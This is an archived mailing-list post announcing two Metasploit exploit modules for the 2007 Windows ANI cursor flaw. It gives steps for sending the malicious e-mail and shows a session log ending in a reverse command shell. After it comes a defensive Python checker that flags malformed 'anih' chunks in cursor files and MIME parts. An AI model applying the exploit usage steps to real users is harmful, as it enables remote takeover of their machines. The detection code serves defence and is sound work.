Security-Alerts mailing list archive (security-alerts@yandex-team.ru)


[security-alerts] FW: Metasploit vs ANI



> -----Original Message-----
> From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx 
> [mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf 
> Of H D Moore
> Sent: Monday, April 02, 2007 11:03 AM
> To: full-disclosure@xxxxxxxxxxxxxxxxx
> Subject: [Full-disclosure] Metasploit vs ANI
> 
> Two new exploit modules are available for version 3.0 of the Metasploit
> Framework. These modules can be obtained by using the 'Online Update'
> feature in Windows and the 'svn update' command on Unix-like systems.
> 
> Matt Miller posted to the Metasploit Blog about our ANI efforts:
> http://blog.metasploit.com/
> 
> The two exploits can be viewed in the svn repository at metasploit.com:
> http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
> http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/email/ani_loadimage_chunksize.rb
> 
> The first module exploits the ANI flaw through Internet Explorer. It uses
> multiple icon files referenced from a single HTML page. This allows
> client-side brute forcing without resorting to JavaScript. This module
> will execute code on Windows 2000, Windows XP, and Windows Vista using
> the default target. As mentioned in the blog, a command shell is not
> directly accessible on Vista, but the Meterpreter payload can be used to
> bust out of the low-privileged process :-)
> 
> The second module exploits the ANI flaw through Outlook and Outlook
> Express. It sends a multipart MIME e-mail that contains multiple icon
> files referenced from an HTML message. This allows brute forcing of the
> correct target via the mail reader, all without any form of client-side
> scripting. To use this module, point RHOST and RPORT at an SMTP server
> that will relay your email. Set the MAILFROM and MAILTO options, select a
> payload, launch the exploit, and wait for your payload to execute.
> 
> An example session from the e-mail based exploit module:
> 
> msf exploit(ani_loadimage_chunksize) > exploit
> [*] Started reverse handler
> [*] Connecting to SMTP server localhost:20025...
> [*] SMTP: 220 slug.metasploit.com ESMTP
> [*] SMTP: 250-slug.metasploit.com
> 250-PIPELINING
> 250-8BITMIME
> 250-AUTH LOGIN PLAIN CRAM-MD5
> 250 SIZE 0
> [*] SMTP: 250 ok
> [*] SMTP: 250 ok
> [*] Sending the message (404759 bytes)...
> [*] SMTP: 354 go ahead
> [*] SMTP: 250 ok 1175497222 qp 12648
> [*] Closing the connection...
> [*] SMTP: 221 slug.metasploit.com
> [*] Waiting for a payload session (backgrounding)...
> [*] Exploit running as background job.
> msf exploit(ani_loadimage_chunksize) > 
> 
> [*] Command shell session 1 opened (192.168.0.127:4444 -> 
> 192.168.0.127:37299)
> 
> msf exploit(ani_loadimage_chunksize) > sessions -i 1
> [*] Starting interaction with 1...
> 
> Microsoft Windows XP [Version 5.1.2600]
> (C) Copyright 1985-2001 Microsoft Corp.
> 
> C:\program files\Outlook Express>  
> 
> Enjoy!
> 
> - The Metasploit Staff
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
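The two modules above deliver malformed animated cursors either from an HTML page or as parts of a multipart MIME message, and the module name points at the condition they abuse: an 'anih' chunk whose declared length is larger than the 36-byte ANIHEADER that a real animated cursor carries (the flaw Microsoft patched as MS07-017). The checker below is an added example, not code from the original post or from the Metasploit project. It walks the RIFF/ACON chunk list, flags any anih chunk that does not declare exactly 36 bytes or that claims more data than remains, and then applies the same check to every MIME part whose bytes look like an ACON container, ignoring the declared Content-Type and filename since neither is trusted. The cursor bytes, the header values and the sample message are constructed here; the 'A' filler in the malformed sample stands in for whatever the oversized chunk would actually carry.

```python
import email
import struct
from email.message import EmailMessage

ANIH_EXPECTED_SIZE = 36  # sizeof(ANIHEADER): nine little-endian DWORDs


def iter_riff_chunks(data, offset, end):
    """Yield (fourcc, payload_offset, declared_size) for each chunk in data[offset:end].
    The size is taken straight from the file; callers must not trust it."""
    while offset + 8 <= end:
        fourcc = data[offset:offset + 4]
        (size,) = struct.unpack_from('<I', data, offset + 4)
        yield fourcc, offset + 8, size
        offset += 8 + size + (size & 1)  # RIFF pads odd-sized chunks to an even boundary


def _walk(data, offset, end, findings, state):
    """Recursive chunk walk; descends into LIST chunks so a nested anih is not missed."""
    for fourcc, payload, size in iter_riff_chunks(data, offset, end):
        if fourcc == b'anih':
            state['anih'] += 1
            if size != ANIH_EXPECTED_SIZE:
                findings.append(f'anih #{state["anih"]} at offset {payload - 8} declares '
                                f'{size} bytes, expected {ANIH_EXPECTED_SIZE}')
        if payload + size > end:
            findings.append(f'chunk {fourcc!r} at offset {payload - 8} claims {size} bytes '
                            f'but only {end - payload} remain')
            return
        if fourcc == b'LIST' and size >= 4:
            _walk(data, payload + 4, payload + size, findings, state)  # skip the list-type fourcc


def check_ani(data):
    """Return a list of findings for one ACON container; an empty list means it looks sane."""
    if len(data) < 12 or data[:4] != b'RIFF' or data[8:12] != b'ACON':
        return ['not a RIFF/ACON (animated cursor) file']
    (riff_size,) = struct.unpack_from('<I', data, 4)
    findings, state = [], {'anih': 0}
    _walk(data, 12, min(len(data), 8 + riff_size), findings, state)
    if state['anih'] == 0:
        findings.append('no anih chunk found')
    return findings


def build_ani(chunks):
    """Constructed sample builder: an ACON container holding the given (fourcc, payload) chunks."""
    body = b''
    for fourcc, payload in chunks:
        body += fourcc + struct.pack('<I', len(payload)) + payload
        body += b'\x00' if len(payload) & 1 else b''
    return b'RIFF' + struct.pack('<I', 4 + len(body)) + b'ACON' + body


# Constructed header: cbSizeof=36, 1 frame, 1 step, 32x32, 32 bpp, 1 plane, rate 10, flags 1
GOOD_HEADER = struct.pack('<9I', 36, 1, 1, 32, 32, 32, 1, 10, 1)
BENIGN = build_ani([(b'anih', GOOD_HEADER)])
# A valid first anih followed by a second one with an oversized declared length
SUSPECT = build_ani([(b'anih', GOOD_HEADER), (b'anih', b'A' * 200)])


def scan_mail(raw):
    """Run check_ani over every leaf MIME part whose bytes start like an ACON container.
    Keyed by filename when present, otherwise by part index."""
    msg = email.message_from_bytes(raw)
    results = {}
    for i, part in enumerate(msg.walk()):
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True) or b''
        if payload[:4] == b'RIFF' and payload[8:12] == b'ACON':
            results[part.get_filename() or f'part{i}'] = check_ani(payload)
    return results


def build_sample_mail():
    """Constructed sample: an HTML message carrying two 'icon' attachments, one benign, one malformed."""
    m = EmailMessage()
    m['From'] = 'sender@example.test'
    m['To'] = 'victim@example.test'
    m['Subject'] = 'constructed sample'
    m.set_content('<html><body><p>hello</p></body></html>', subtype='html')
    m.add_attachment(BENIGN, maintype='image', subtype='x-icon', filename='a.ico')
    m.add_attachment(SUSPECT, maintype='image', subtype='x-icon', filename='b.ico')
    return m.as_bytes()


if __name__ == '__main__':
    for name, findings in scan_mail(build_sample_mail()).items():
        print(name, findings or 'ok')
```

The check keys on the container magic rather than on the extension or MIME type because the loader in question parses the bytes it is handed, so an ANI served as .ico or image/x-icon is as interesting as one named .ani. A hit on the second anih chunk is a strong signal; a chunk claiming more bytes than the file holds is worth a look as well, since a parser that trusts that length reads past the buffer.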

Copyright © Lexa Software, 1996-2009.